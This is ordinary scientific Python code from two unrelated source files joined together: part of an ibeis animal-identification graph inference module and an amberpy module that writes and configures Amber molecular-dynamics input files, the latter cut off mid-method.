def get_feedback_probs(infr):
""" Helper """
unique_pairs = list(infr.user_feedback.keys())
# Take most recent review
review_list = [infr.user_feedback[edge][-1] for edge in unique_pairs]
p_nomatch = np.array(ut.dict_take_column(review_list, 'p_nomatch'))
p_match = np.array(ut.dict_take_column(review_list, 'p_match'))
p_notcomp = np.array(ut.dict_take_column(review_list, 'p_notcomp'))
state_probs = np.vstack([p_nomatch, p_match, p_notcomp])
review_stateid = state_probs.argmax(axis=0)
review_state = ut.take(infr.truth_texts, review_stateid)
p_bg = 0.5 # Needs to be thresh value
part1 = p_match * (1 - p_notcomp)
part2 = p_bg * p_notcomp
p_same_list = part1 + part2
return p_same_list, unique_pairs, review_state
def apply_mst(infr):
if infr.verbose:
print('[infr] apply_mst')
# Remove old MST edges
infr.remove_mst_edges()
infr.ensure_mst()
def ensure_mst(infr):
"""
Use minimum spannning tree to ensure all names are connected
Needs to be applied after any operation that adds/removes edges
"""
if infr.verbose:
print('[infr] ensure_mst')
import networkx as nx
# Find clusters by labels
node2_label = nx.get_node_attrs(infr.graph, 'name_label')
label2_nodes = ut.group_items(node2_label.keys(), node2_label.values())
aug_graph = infr.graph.copy().to_undirected()
# remove cut edges
edge_to_iscut = nx.get_edge_attrs(aug_graph, 'is_cut')
cut_edges = [edge for edge, flag in edge_to_iscut.items() if flag]
aug_graph.remove_edges_from(cut_edges)
# Enumerate cliques inside labels
#unflat_edges = [list(ut.product(nodes, nodes)) for nodes in label2_nodes.values()]
unflat_edges = [list(ut.itertwo(nodes)) for nodes in label2_nodes.values()]
node_pairs = [tup for tup in ut.iflatten(unflat_edges) if tup[0] != tup[1]]
# Remove candidate MST edges that exist in the original graph
orig_edges = list(aug_graph.edges())
candidate_mst_edges = [edge for edge in node_pairs if not aug_graph.has_edge(*edge)]
# randomness prevents chains and visually looks better
rng = np.random.RandomState(42)
aug_graph.add_edges_from(candidate_mst_edges)
# Weight edges in aug_graph such that existing edges are chosen
# to be part of the MST first before suplementary edges.
nx.set_edge_attributes(aug_graph, 'weight',
{edge: 0.1 for edge in orig_edges})
nx.set_edge_attributes(aug_graph, 'weight',
{edge: 10.0 + rng.randint(1, 100)
for edge in candidate_mst_edges})
new_mst_edges = []
if infr.verbose:
print('[infr] adding %d MST edges' % (len(new_mst_edges)))
for cc_sub_graph in nx.connected_component_subgraphs(aug_graph):
mst_sub_graph = nx.minimum_spanning_tree(cc_sub_graph)
for edge in mst_sub_graph.edges():
redge = edge[::-1]
# Only add if this edge is not in the original graph
if not (infr.graph.has_edge(*edge) and infr.graph.has_edge(*redge)):
new_mst_edges.append(redge)
# Add new MST edges to original graph
infr.graph.add_edges_from(new_mst_edges)
nx.set_edge_attrs(infr.graph, '_mst_edge', _dz(new_mst_edges, [True]))
def mst_review(infr):
"""
Adds implicit reviews to connect all ndoes with the same name label
"""
if infr.verbose:
print('[infr] ensure_mst')
import networkx as nx
# Find clusters by labels
node2_label = nx.get_node_attrs(infr.graph, 'name_label')
label2_nodes = ut.group_items(node2_label.keys(), node2_label.values())
aug_graph = infr.graph.copy().to_undirected()
# remove cut edges
edge_to_iscut = nx.get_edge_attrs(aug_graph, 'is_cut')
cut_edges = [edge for edge, flag in edge_to_iscut.items() if flag]
aug_graph.remove_edges_from(cut_edges)
# Enumerate chains inside labels
unflat_edges = [list(ut.itertwo(nodes)) for nodes in label2_nodes.values()]
node_pairs = [tup for tup in ut.iflatten(unflat_edges) if tup[0] != tup[1]]
# Remove candidate MST edges that exist in the original graph
orig_edges = list(aug_graph.edges())
candidate_mst_edges = [edge for edge in node_pairs if not aug_graph.has_edge(*edge)]
aug_graph.add_edges_from(candidate_mst_edges)
# Weight edges in aug_graph such that existing edges are chosen
# to be part of the MST first before suplementary edges.
def get_edge_mst_weights(edge):
state = aug_graph.get_edge_data(*edge).get('reviewed_state', 'unreviewed')
is_mst = aug_graph.get_edge_data(*edge).get('_mst_edge', False)
normscore = aug_graph.get_edge_data(*edge).get('normscore', 0)
if state == 'match':
# favor reviewed edges
weight = .01
else:
# faveor states with high scores
weight = 1 + (1 - normscore)
if is_mst:
# try to not use mst edges
weight += 3.0
return weight
rng = np.random.RandomState(42)
nx.set_edge_attributes(aug_graph, 'weight',
{edge: get_edge_mst_weights(edge) for edge in orig_edges})
nx.set_edge_attributes(aug_graph, 'weight',
{edge: 10.0 + rng.randint(1, 100)
for edge in candidate_mst_edges})
new_mst_edges = []
for cc_sub_graph in nx.connected_component_subgraphs(aug_graph):
mst_sub_graph = nx.minimum_spanning_tree(cc_sub_graph)
for edge in mst_sub_graph.edges():
data = aug_graph.get_edge_data(*edge)
state = data.get('reviewed_state', 'unreviewed')
# Append only if this edge needs a review flag
if state != 'match':
new_mst_edges.append(edge)
if infr.verbose:
print('[infr] reviewing %d MST edges' % (len(new_mst_edges)))
# Apply data / add edges if needed
graph = infr.graph
for edge in new_mst_edges:
redge = edge[::-1]
# Only add if this edge is not in the original graph
if graph.has_edge(*edge):
nx.set_edge_attrs(graph, 'reviewed_state', {edge: 'match'})
infr.add_feedback(edge[0], edge[1], 'match')
elif graph.has_edge(*redge):
nx.set_edge_attrs(graph, 'reviewed_state', {redge: 'match'})
infr.add_feedback(edge[0], edge[1], 'match')
else:
graph.add_edge(*edge, attr_dict={
'_mst_edge': True, 'reviewed_state': 'match'})
infr.add_feedback(edge[0], edge[1], 'match')
def get_edge_attr(infr, key):
return nx.get_edge_attributes(infr.graph, key)
def get_node_attr(infr, key):
return nx.get_node_attributes(infr.graph, key)
def apply_match_scores(infr):
"""
CommandLine:
python -m ibeis.algo.hots.graph_iden apply_match_scores --show
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('PZ_MTEST')
>>> infr.exec_matching()
>>> infr.apply_match_edges()
>>> infr.apply_match_scores()
>>> result = infr.apply_match_scores()
>>> infr.get_edge_attr('score')
"""
if infr.verbose:
print('[infr] apply_match_scores')
if infr.cm_list is None:
print('[infr] no scores to apply!')
return
# Build up scores
edges = list(infr.graph.edges())
qaid2_cm = {cm.qaid: cm for cm in infr.cm_list}
edge_to_data = ut.ddict(dict)
for u, v in edges:
if u > v:
u, v = v, u
cm1 = qaid2_cm.get(u, None)
cm2 = qaid2_cm.get(v, None)
scores = []
ranks = []
for cm in ut.filter_Nones([cm1, cm2]):
for aid in [u, v]:
idx = cm.daid2_idx.get(aid, None)
if idx is None:
continue
score = cm.annot_score_list[idx]
rank = cm.get_annot_ranks([aid])[0]
scores.append(score)
ranks.append(rank)
if len(scores) == 0:
score = None
rank = None
else:
rank = vt.safe_min(ranks)
score = np.nanmean(scores)
edge_to_data[(u, v)]['score'] = score
edge_to_data[(u, v)]['rank'] = rank
# Remove existing attrs
ut.nx_delete_edge_attr(infr.graph, 'score')
ut.nx_delete_edge_attr(infr.graph, 'rank')
ut.nx_delete_edge_attr(infr.graph, 'normscore')
edges = list(edge_to_data.keys())
edge_scores = list(ut.take_column(edge_to_data.values(), 'score'))
edge_scores = ut.replace_nones(edge_scores, np.nan)
edge_scores = np.array(edge_scores)
edge_ranks = np.array(list(ut.take_column(edge_to_data.values(), 'rank')))
normscores = edge_scores / np.nanmax(edge_scores)
# Add new attrs
nx.set_edge_attrs(infr.graph, 'score', dict(zip(edges, edge_scores)))
nx.set_edge_attrs(infr.graph, 'rank', dict(zip(edges, edge_ranks)))
nx.set_edge_attrs(infr.graph, 'normscore', dict(zip(edges, normscores)))
#return edge_data
def apply_match_edges(infr, review_cfg={}):
if infr.verbose:
print('[infr] apply_match_edges')
if infr.cm_list is None:
print('[infr] matching has not been run!')
return
qreq_ = infr.qreq_
cm_list = infr.cm_list
ranks_top = review_cfg.get('ranks_top', None)
ranks_bot = review_cfg.get('ranks_bot', None)
edges = get_cm_breaking(qreq_, cm_list,
ranks_top=ranks_top,
ranks_bot=ranks_bot)
# Create match-based graph structure
infr.remove_mst_edges()
infr.graph.add_edges_from(edges)
infr.ensure_mst()
def apply_feedback_edges(infr):
"""
Updates nx graph edge attributes for feedback
Example:
>>> # ENABLE_DOCTEST
>>> from ibeis.algo.hots.graph_iden import * # NOQA
>>> infr = testdata_infr('testdb1')
>>> infr.reset_feedback()
>>> infr.apply_feedback_edges()
>>> result = str(infr)
>>> print(result)
<AnnotInference(nAids=6, nEdges=2)>
"""
if infr.verbose:
print('[infr] apply_feedback_edges')
infr.remove_mst_edges()
ut.nx_delete_edge_attr(infr.graph, 'reviewed_weight')
ut.nx_delete_edge_attr(infr.graph, 'reviewed_state')
p_same_list, unique_pairs_, review_state = infr.get_feedback_probs()
# Put pair orders in context of the graph
unique_pairs = [(aid2, aid1) if infr.graph.has_edge(aid2, aid1) else
(aid1, aid2) for (aid1, aid2) in unique_pairs_]
# Ensure edges exist
for edge in unique_pairs:
if not infr.graph.has_edge(*edge):
#print('add review edge = %r' % (edge,))
infr.graph.add_edge(*edge)
#else:
# #print('have edge edge = %r' % (edge,))
nx.set_edge_attrs(infr.graph, 'reviewed_state',
_dz(unique_pairs, review_state))
nx.set_edge_attrs(infr.graph, 'reviewed_weight',
_dz(unique_pairs, p_same_list))
infr.ensure_mst()
def get_threshold(infr):
# Only use the normalized scores to estimate a threshold
normscores = np.array(nx.get_edge_attrs(infr.graph, 'normscore').values())
if infr.verbose:
print('len(normscores) = %r' % (len(normscores),))
isvalid = ~np.isnan(normscores)
curve = np.sort(normscores[isvalid])
thresh = estimate_threshold(curve, method=None)
if infr.verbose:
print('[estimate] thresh = %r' % (thresh,))
if thresh is None:
thresh = .5
infr.thresh = thresh
return thresh
def apply_weights(infr):
"""
Combines scores and user feedback into edge weights used in inference.
"""
if infr.verbose:
print('[infr] apply_weights')
ut.nx_delete_edge_attr(infr.graph, 'cut_weight')
# mst not needed. No edges are removed
edges = list(infr.graph.edges())
edge2_normscore = nx.get_edge_attrs(infr.graph, 'normscore')
normscores = np.array(ut.dict_take(edge2_normscore, edges, np.nan))
edge2_reviewed_weight = nx.get_edge_attrs(infr.graph, 'reviewed_weight')
reviewed_weights = np.array(ut.dict_take(edge2_reviewed_weight,
edges, np.nan))
# Combine into weights
weights = normscores.copy()
has_review = ~np.isnan(reviewed_weights)
weights[has_review] = reviewed_weights[has_review]
# remove nans
is_valid = ~np.isnan(weights)
weights = weights.compress(is_valid, axis=0)
edges = ut.compress(edges, is_valid)
nx.set_edge_attrs(infr.graph, 'cut_weight', _dz(edges, weights))
def get_scalars(infr):
scalars = {}
scalars['reviewed_weight'] = nx.get_edge_attrs(
infr.graph, 'reviewed_weight').values()
scalars['score'] = nx.get_edge_attrs(infr.graph, 'score').values()
scalars['normscore'] = nx.get_edge_attrs(infr.graph, 'normscore').values()
scalars[CUT_WEIGHT_KEY] = nx.get_edge_attrs(infr.graph, CUT_WEIGHT_KEY).values()
return scalars
#def remove_cuts(infr):
# """
# Undo all cuts HACK
# """
# if infr.verbose:
# print('[infr] apply_cuts')
# graph = infr.graph
# infr.ensure_mst()
# ut.nx_delete_edge_attr(graph, 'is_cut')
def apply_cuts(infr):
"""
Cuts edges with different names and uncuts edges with the same name.
"""
if infr.verbose:
print('[infr] apply_cuts')
graph = infr.graph
infr.ensure_mst()
ut.nx_delete_edge_attr(graph, 'is_cut')
node_to_label = nx.get_node_attrs(graph, 'name_label')
edge_to_cut = {(u, v): node_to_label[u] != node_to_label[v]
for (u, v) in graph.edges()}
nx.set_edge_attrs(graph, 'is_cut', edge_to_cut)
def infer_cut(infr, **kwargs):
"""
Applies name labels based on graph inference and then cuts edges
"""
from ibeis.algo.hots import graph_iden
if infr.verbose:
print('[infr] infer_cut')
infr.remove_mst_edges()
infr.model = graph_iden.InfrModel(infr.graph)
model = infr.model
thresh = infr.get_threshold()
#weights = np.array(nx.get_edge_attrs(infr.graph, 'weight').values())
#isvalid = ~np.isnan(weights)
#curve = np.sort(weights[isvalid])
model._update_weights(thresh=thresh)
labeling, params = model.run_inference2(max_labels=len(infr.aids))
#min_labels=min_labels, max_labels=max_labels)
nx.set_node_attrs(infr.graph, 'name_label', model.node_to_label)
infr.apply_cuts()
infr.ensure_mst()
def apply_all(infr):
if infr.verbose:
print('[infr] apply_all')
infr.exec_matching()
infr.apply_mst()
infr.apply_match_edges()
infr.apply_match_scores()
infr.apply_feedback_edges()
infr.apply_weights()
infr.infer_cut()
def find_possible_binary_splits(infr):
#s = infr.simplify_graph(infr.graph)
flagged_edges = []
for subgraph in infr.connected_compoment_reviewed_subgraphs():
inconsistent_edges = [
edge
for edge, state in nx.get_edge_attrs(subgraph, 'reviewed_state').items()
if state == 'nomatch']
subgraph.remove_edges_from(inconsistent_edges)
subgraph = infr.simplify_graph(subgraph)
for s, t in inconsistent_edges:
edgeset = nx.minimum_edge_cut(subgraph, s, t)
edgeset = set([tuple(sorted(edge)) for edge in edgeset])
flagged_edges.append(edgeset)
#print('x = %r' % (x,))
#cut_value, partition = nx.stoer_wagner(subgraph)
#pass
edges = ut.flatten(flagged_edges)
return edges
def piecewise_weighting(infr, normscores, edges):
# Old code
edge_scores = normscores
# Try to put scores in a 0 to 1 range
control_points = [
(0.0, .001),
(3.0, .05),
(15.0, .95),
(None, .99),
]
edge_weights = edge_scores.copy()
for (pt1, prob1), (pt2, prob2) in ut.itertwo(control_points):
if pt1 is None:
pt1 = np.nanmin(edge_scores)
if pt2 is None:
pt2 = np.nanmax(edge_scores) + .0001
pt_len = pt2 - pt1
prob_len = prob2 - prob1
flag = np.logical_and(edge_scores >= pt1, edge_scores < pt2)
edge_weights[flag] = (((edge_scores[flag] - pt1) / pt_len) * prob_len) + prob1
nx.set_edge_attrs(infr.graph, CUT_WEIGHT_KEY, _dz(edges, edge_weights))
p_same, unique_pairs = infr.get_feedback_probs()
unique_pairs = [tuple(x.tolist()) for x in unique_pairs]
for aid1, aid2 in unique_pairs:
if not infr.graph.has_edge(aid1, aid2):
infr.graph.add_edge(aid1, aid2)
nx.set_edge_attrs(infr.graph, CUT_WEIGHT_KEY, _dz(unique_pairs, p_same))
#nx.set_edge_attrs(infr.graph, 'lw', _dz(unique_pairs, [6.0]))
"""
pt.plot(sorted(edge_weights))
pt.plot(sorted(vt.norm01(edge_scores)))
"""
#import scipy.special
#a = 1.5
#b = 2
#p_same = scipy.special.expit(b * edge_scores - a)
#confidence = (2 * np.abs(0.5 - p_same)) ** 2
def testdata_infr(defaultdb='PZ_MTEST'):
import ibeis
ibs = ibeis.opendb(defaultdb=defaultdb)
aids = [1, 2, 3, 4, 5, 6]
infr = AnnotInference(ibs, aids, autoinit=True)
return infr
if __name__ == '__main__':
r"""
CommandLine:
python -m ibeis.algo.hots.graph_iden
python -m ibeis.algo.hots.graph_iden --allexamples
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 26
@author: bs15ansj
This module contains classes used for writing and submitting molecular
dynamics simulation files on amber.
MDInputs
This is a base class used by all of the input objects.
ProductionInput
Dataclass object storing paramaters for a production simulation in the NPT
ensemble.
"""
from amberpy.crossbow import run_pmemd
from amberpy.utilities import get_name_from_file
import os
import copy
from typing import Union
from amberpy import get_module_logger
import logging
logger = logging.getLogger(__name__)
class MDInput:
'''Base class for MD inputs.
Do not use this class directly, but instead, use one of the classes that
inherits from this class: MinimisationInput, EquilibrationInput,
ProductionInput. These subclasses determine which attributes will be
turned on/off. In theory, any valid MD flag that can be used with Amber's
pmemd.cuda_SPFP can be given to this input object and will be written into
the mdin file. The attributes listed here are the most common ones, but
please refer the Amber manual for a more detailed description
(https://ambermd.org/doc12/Amber21.pdf).
Attributes
----------
imin : int, default=0
Flag to run minimisation.
0 = run molecular dynamics without any minimisation.
1 = perform energy minimisation.
maxcyc : int, default=5000
The maximum number of minimisation cycles to use.
ncyc : int, default=2500
The number of steepest descent minimisation cycles to use.
irest : int, default=1
Flag to restart from a simulation.
0 = do not restart from a simulation, instead start a new one ignoring
velocities and setting the timestep count to 0.
1 = restart from a simulation, reading coordinates and velocities from
a previously saved restart file.
ntx : int, default=5
Flag to read velocities from coordinate file.
1 = read coordinates but not velocities.
5 = read coordinates and velocities.
ntt : int, default=3
Flag for temperature scaling.
0 = constant total energy classsical dynamics.
1 = constant temperature using the weak coupling algorithm.
2 = Anderson-like temperature coupling.
3 = use Langevin dynamics with a collision frequency given by gamma_ln.
9 = optimized Isokinetic Nose-Hoover chain ensemble.
10 = stochastic Isokinetic Nose-Hoover RESPA integrator.
11 = stochastic version of Berendsen thermostat, also known as Bussi
thermostat
gamma_ln : float, default=1.0
Friction coefficient (ps^-1) when ntt=3.
temp0 : float, default=310.0
Target temperature if ntt > 0.
tempi : float, default=0.0
Initial temperature if ntt > 0. If set to 0.0, velocities are
calculated from the forces.
cut : float, default=8.0
Non-bonded cutoff in Angstroms.
nstlim : int, default=125000
Total number of MD steps to peform.
dt : float, default=0.004
Integrator time step in picoseconds.
ntc : int, default=2
Flag for SHAKE to perform bond length constraints.
1 = SHAKE is not performed.
2 = bonds containing hydrogen are constrained.
3 = all bonds are constrained.
ntf : int, default=2
Flag for force evaluation (typically set ntf=ntc).
1 = complete interaction calculated.
2 = bond interactions involving H-atoms omitted (use with ntc=2).
3 = all the bond interactions are omitted (use with ntc=3).
4 = angle involving H-atoms and all bonds are omitted.
5 = all bond and angle interactions are omitted.
6 = dihedrals involving H-atoms and all bonds and all angle
interactions are omitted.
7 = all bond, angle and dihedral interactions are omitted.
8 = all bond, angle, dihedral and non-bonded interactions are omitted.
ntpr : int, default=1000
Write energy information to mdout and mdin files every 'ntpr' steps.
ntwx : int, default=25000
Write coordinates to trajectory every 'ntwx' steps.
ntwr : int, default=1000
Write coordinates to a restart file every 'ntwr' steps.
ntwv : int, default=0
Write velcities to an mdvel file every 'ntwv' steps.
-1 = write velocities to trajectory at an interval defined by 'ntwx'.
0 = do not write velocities.
ntwf : int, default=0
Write forces to an mdfrc file every 'ntwf' steps.
-1 = write forces to trajectory at an interval defined by 'ntwx'.
0 = do not write forces.
ntxo : int, default=2
Restart file format.
1 = formatted (ASCII).
2 = netCDF (nc, recommended).
ioutfm : int, default=1
Trajectory/velocity file format.
1 = formatted (ASCII).
2 = netCDF (nc, recommended).
iwrap : int, default=1
Coordinate wrapping.
0 = do not wrap.
1 = wrap coordinates when printing them to the same unit cell.
barostat : int, default=2
Barostat flag.
1 = Berendsen.
0 = Mont Carlo.
ntp : int, default=0
Flag for constant pressure dynamics. Set to >0 for NPT ensemble.
0 = No pressure scaling.
1 = isotropic position scaling.
pres0 : float, default=1.0
Target external pressure, in bar.
posres : int, default=False
Tuple of residue numbers defining start/end residues of protein chains
to be constrained.
'''
def __init__(self, **kwargs):
'''
How this class is initialised depends on which key word arguments are
supplied. In theory, you could call this class directly by specifying
the all of the key word arguments that you want in the mdin file,
however, the preffered method would be to instantiate one of the
sublasses which ensure that the keyword arguments are set correctly.
Alternatively, you can make a new input class to inherit from this and
set the key word arguments within it's __init__ method.
Parameters
----------
**kwargs
The parameters for this argument can be set to any of the
attributes listed in the docstring of this class.
'''
# Set required (default) attributes
self.ntpr: int = 1000
self.watnam: str = "'WAT'"
self.owtnm: str = "'O'"
self.posres: tuple = False
self.cut: float = 8.0
self.ntxo: int = 2
# If minimisation is turned on, enable minimisation specific attributes
if kwargs['imin'] == 1:
self.imin: int = 1
self.maxcyc: int = 5000
self.ncyc: int = 2500
# If minimisation is turned off, enable simulation specific attributes
elif kwargs['imin'] == 0:
self.imin: int = 0
self.irest: int = 1
self.ntx: int = 5
self.ntt: int = 3
self.gamma_ln: float = 1.0
# If an initial temperature is given, enable the tempi attribute
if 'tempi' in kwargs:
self.tempi = kwargs['tempi']
self.temp0: float = 310.0
self.nstlim: int = 2500000
self.dt: float = 0.004
self.ntc: int = 2
self.ntf: int = 2
self.ntwx: int = 25000
self.ntwr: int = 1000
self.ntwv: int = 0
self.ntwf: int = 0
self.ioutfm: int = 1
self.iwrap: int = 1
# If the ntp argument is given, turn on pressure control attributes
if kwargs['ntp'] == 1:
self.ntp: int = 1
self.pres0: float = 1.0
self.barostat: int = 2
# Get a list of attributes. Only those that have been turned on will
# be in the list
attributes = list(self.__dict__.keys())
# Update attributes with any given via kwargs
for arg in kwargs:
if arg in attributes:
setattr(self, arg, kwargs.get(arg))
# Make a new dictionary of attributes that are turned on
self.arg_dict = {arg : self.__dict__[arg] for arg in attributes}
def write(self, out_dir, fname):
'''Writes an mdin file containing flags for all of the turned on
attributes. The filename is stored in the fname attribute.
Parameters
----------
out_dir : str
Directory in which the file should be written.
fname : str
The name of the file to be written.
'''
# Set fname attribute (used downstream for making HPC input files)
self.fname = fname
# Open file and write all of the turned on attributes and their values
# in mdin format
with open(f"{out_dir}/{fname}", "w+") as f:
f.write("&cntrl\n")
for var, val in self.arg_dict.items():
# posres argument is not in the correct format so change it
if var != "posres":
f.write("\t%s=%s,\n" % (var, val))
# If positional restraints are turned on, add the ntr flag and
# write the restraint mask
if self.posres:
residues, weight = self.posres
f.write('\tntr=1,\n')
f.write(f'/\nProtein posres\n{weight}\nRES ')
for a, b in residues:
f.write(f'{a} {b} ')
f.write('\nEND\nEND')
else:
f.write('/\n')
class MinimisationInput(MDInput):
'''Minimisation input class.
Inherits attributes and methods from the MDInput class.
'''
def __init__(self, **kwargs):
'''
Parameters
----------
**kwargs
Any attribute of the MDInput class can be provided as a key word
argument, however, minimisation will be turned on (simulation
turned off) limiting the number of attributes which can be turned
on.
'''
# Turn minimisation on
kwargs['imin'] = 1
# No pressure control
kwargs['ntp'] = 0
# Print energy more frequently
kwargs['ntpr'] = 100
# Instantiate super class with key word arguments
super().__init__(**kwargs)
def __str__(self):
'''str: The name of the input. Used for file naming.'''
return 'minimisation'
class EquilibrationInput(MDInput):
'''Equilibration (NVT) input class.
Inherits attributes and methods from the MDInput class.
'''
def __init__(self, **kwargs):
'''
Parameters
----------
**kwargs
Any attribute of the MDInput class can be provided as a key word
argument, however, minimisation will be turned off (simulation
turned on) and pressure control will be turned off limiting the
number of attributes which can be turned on.
'''
# Turn minimisation off
kwargs['imin'] = 0
# This is not a restart from a previous simulation
kwargs['irest'] = 0
# Coordinate file does not have velocities
kwargs['ntx'] = 1
# Turn off ntp
kwargs['ntp'] = 0
# Make sure an initial temperature is set
if 'tempi' not in kwargs.keys():
kwargs['tempi'] = 0.0
# Instantiate super class with key word arguments
super().__init__(**kwargs)
def __str__(self):
'''str: The name of the input. Used for file naming.'''
return 'equilibration'
class ProductionInput(MDInput):
'''
Production (NPT) input class.
Inherits attributes and methods from the MDInputclass.
'''
def __init__(self, **kwargs):
'''
Parameters
----------
**kwargs
Any attribute of the MDInput class can be provided as a key word
argument, however, minimisation will be turned off (simulation
turned on) and pressure control will be turned off limiting the
number of attributes which can be turned on.
'''
# Turn minimisation off
kwargs['imin'] = 0
# Continue on from restart file
kwargs['irest'] = 1
# Read velocities from coordinate file
kwargs['ntx'] = 5
# Turn on NPT ensemble
kwargs['ntp'] = 1
# Instantiate super class with key word arguments
super().__init__(**kwargs)
def __str__(self):
return 'production'
class Simulation:
"""Class for running MD simulations.
Attributes
----------
md_steps : list
A list of MDInput objects.
md_inputs : list
A list of the input file corresponding to the input objects in
md_steps.
name : str
The name of the simulation, used for job naming.
simulation_directory : str
The name of the directory containing all of the simulation
input/output files.
parm7 : str
Path of the parm7 file made by tleap.
rst7 : str
Path of the rst7 file made by tleap.
"""
def __init__(self,
name,
parm7,
rst7,
simulation_directory=None,
):
"""
Parameters
----------
name : str, optional
The name of the simulation, used for job naming.
parm7 : str
Path to the parm7 input file.
rst7 : str
Path to the rst7 input file.
simulation_directory : str or None
Directory to perform the simulation in. Defaults to current
working directory if None
"""
# Set attributes from arguments
self.parm7 = parm7
self.rst7 = rst7
self.ref_rst7 = rst7
self.simulation_directory = simulation_directory
# If no name is given, get it from the parm7 file
if name is None:
name = get_name_from_file(parm7)
# Add an 'a' to the jobname if it starts with a digit because arc does
# not like them
if name[0].isdigit():
name = 'a'+name
# Set attributes
self.name = name
self.md_steps = []
self.md_inputs = []
self.md_job_names = []
self.trajectories = []
self.completed_steps = []
def add_minimisation_step(
self,
steepest_descent_steps: int = 2500,
conjugate_gradient_steps: int = 2500,
nb_cutoff: float = 9.0,
restraints: Union[str, tuple] = ('protein', 1),
md_input: MinimisationInput = None,
quiet=False):
'''Adds a minimisation step to the simulation.
Parameters
----------
steepest_descent_steps : int, optional
Number of steepest descent minimisation steps to perform.
conjugate_gradient_steps : int, optional
Number of conjugate gradient minimisation steps to perform.
nb_cutoff : float, optional
The non-bonded interaction cutoff limit in Angstroms.
restraints : str or tuple, optional
Add resraints to either the entire protein, e.g. restraints =
("protein", 1), or to the residues anddefined by a length 3 tuple e.g.
restraints = ((1, 500), 1). The second element of the tuple is
the restraint weight in kcal/mol.
md_input : MinimisationInput, optional
Overrides all other parameters and instead uses a MinimisationInput
instance.
'''
# If no md_input provided, build one from the key word arguments
if md_input is None:
if not quiet:
logger.info('Adding minimisation step: steepest_descent_steps='
f'{steepest_descent_steps}, conjugate_gradient_steps='
f'{conjugate_gradient_steps}, nb_cutoff={nb_cutoff} An'
f"gstroms, restraints='{restraints}'")
kwargs = {}
kwargs['ncyc'] = steepest_descent_steps
kwargs['maxcyc'] = steepest_descent_steps + conjugate_gradient_steps
kwargs['cut'] = nb_cutoff
# If restraints are given process them into MDInput compatible
# argument
if restraints is not None:
posres = self._restraints_from_arg(restraints)
# If 'protein' is given as the restraint argument, but this
# class has been made directly (with Simulation() rather than
# Experiment()) and therefore doesn't have a protein_termini
# attribute, posres will be None so do not set protein
# restraints
if posres is not None:
kwargs['posres'] = posres
# Add a MinimisationInput object to the simulation using the key
# word arguments
md_input = MinimisationInput(**kwargs)
self.md_steps.append(md_input)
self.completed_steps.append(0)
# If Minimisation object is provided just add that
elif isinstance(md_input, MinimisationInput):
self.md_steps.append(md_input)
self.completed_steps.append(0)
if not quiet:
logger.info('Adding minimisation step from MinimisationInput')
else:
raise Exception('md_input must be an instance of the MinimisationInput class or None')
if not quiet:
logger.debug(f'Minimisation flags: {md_input.arg_dict}')
def add_equilibration_step(
self,
initial_temperature: float = 0.0,
target_temperature: float = 310.0,
nb_cutoff: float = 9.0,
simulation_time: float = 125.0,
restraints: Union[str, tuple] = ('protein', 1),
md_input: EquilibrationInput = None,
quiet=False):
'''Adds a equilibration step to the simulation.
Parameters
----------
inintial_temperature : float, optional
Initial temperature to start equilibration in Kelvin.
target_temperature : float, optional
Target temperature to reach by the end of the simulation in Kelvin.
nb_cutoff : float, optional
The non-bonded interaction cutoff limit in Angstroms.
simulation_time : float, optional
Total MD simulation_time for the equilibration step in picoseconds.
restraints : str or tuple, optional
Add resraints to either the entire protein, e.g. restraints =
"protein", or to the residues defined by a length 2 tuple e.g.
restraints = (1, 500).
md_input : EquilibrationInput, optional
Overrides all other arguments and instead uses an EquilibrationInput
instance.
'''
# If no md_input provided, build one from the key word arguments
if md_input is None:
if not quiet:
logger.info('Adding equilibration step: inintial_temperature='
f'{initial_temperature}K, target_temperature='
f'{target_temperature}K, nb_cutoff={nb_cutoff} Angstro'
f'ms, simulation_time={simulation_time}ps, restraints='
f"'{restraints}'")
kwargs = {}
kwargs['tempi'] = initial_temperature
kwargs['temp0'] = target_temperature
kwargs['cut'] = nb_cutoff
kwargs['dt'] = 0.001
kwargs['nstlim'] = int(simulation_time/kwargs['dt'])
# If restraints are given process them into MDInput compatible
# argument
if restraints is not None:
posres = self._restraints_from_arg(restraints)
# If 'protein' is given as the restraint argument, but this
# class has been made directly (with Simulation() rather than
# Experiment()) and therefore doesn't have a protein_termini
# attribute, posres will be None so do not set protein
# restraints
if posres is not None:
kwargs['posres'] = posres
# Add a EquilibrationInput object to the simulation using the key
# word arguments
md_input = EquilibrationInput(**kwargs)
self.md_steps.append(md_input)
self.completed_steps.append(0)
# If Equilibration object is provided just add that
elif isinstance(md_input, EquilibrationInput):
self.md_steps.append(md_input)
self.completed_steps.append(0)
if not quiet:
logger.info('Adding equilibration step from EquilibrationInput')
else:
raise Exception('md_input must be an instance of the EquilibrationInput class or None')
if not quiet:
logger.debug(f'Equilibration flags: {md_input.arg_dict}')
def add_production_step(
self,
timestep: float = 0.004,
target_temperature: float = 310.0,
nb_cutoff: float = 9.0,
simulation_time: float = 100.0,
save_frame_frequency: int = 25000,
restraints: Union[str, tuple] = None,
md_input: ProductionInput = None,
quiet=False
):
'''Adds a Production step to the simulation.
Parameters
----------
timestep : float, optional
The integrator timestep to be used in the simulation. If hydrogen
mass repartitioning is used, set this to 0.004, otherwise set to
0.002 (provided that SHAKE is not turned off manually).
target_temperature : float, optional
Target temperature to be kept at in Kelvin.
nb_cutoff : float, optional
The non-bonded interaction cutoff limit in Angstroms.
simulation_time : float, optional
Total MD simulation_time for the equilibration step in nanoseconds.
md_input : EquilibrationInput, optional
Overrides all other arguments and instead uses an
EquilibrationInput instance.
'''
# If no md_input provided, build one from the key word arguments
if md_input is None:
if not quiet:
logger.info('Adding production step: target_temperature='
f'{target_temperature}K, nb_cutoff={nb_cutoff} Angstro'
f'ms, simulation_time={simulation_time}ns')
kwargs = {}
kwargs['dt'] = timestep
kwargs['cut'] = nb_cutoff
kwargs['nstlim'] = int((1000*simulation_time)/kwargs['dt'])
kwargs['temp0'] = target_temperature
kwargs['ntwx'] = save_frame_frequency
# If restraints are given process them into MDInput compatible
# argument
if restraints is not None:
posres = self._restraints_from_arg(restraints)
# If 'protein' is given as the restraint argument, but this
# class has been made directly (with Simulation() rather than
# Experiment()) and therefore doesn't have a protein_termini
# attribute, posres will be None so do not set protein
# restraints
if posres is not None:
kwargs['posres'] = posres
# Add a ProductionInput object to the simulation using the key
# word arguments
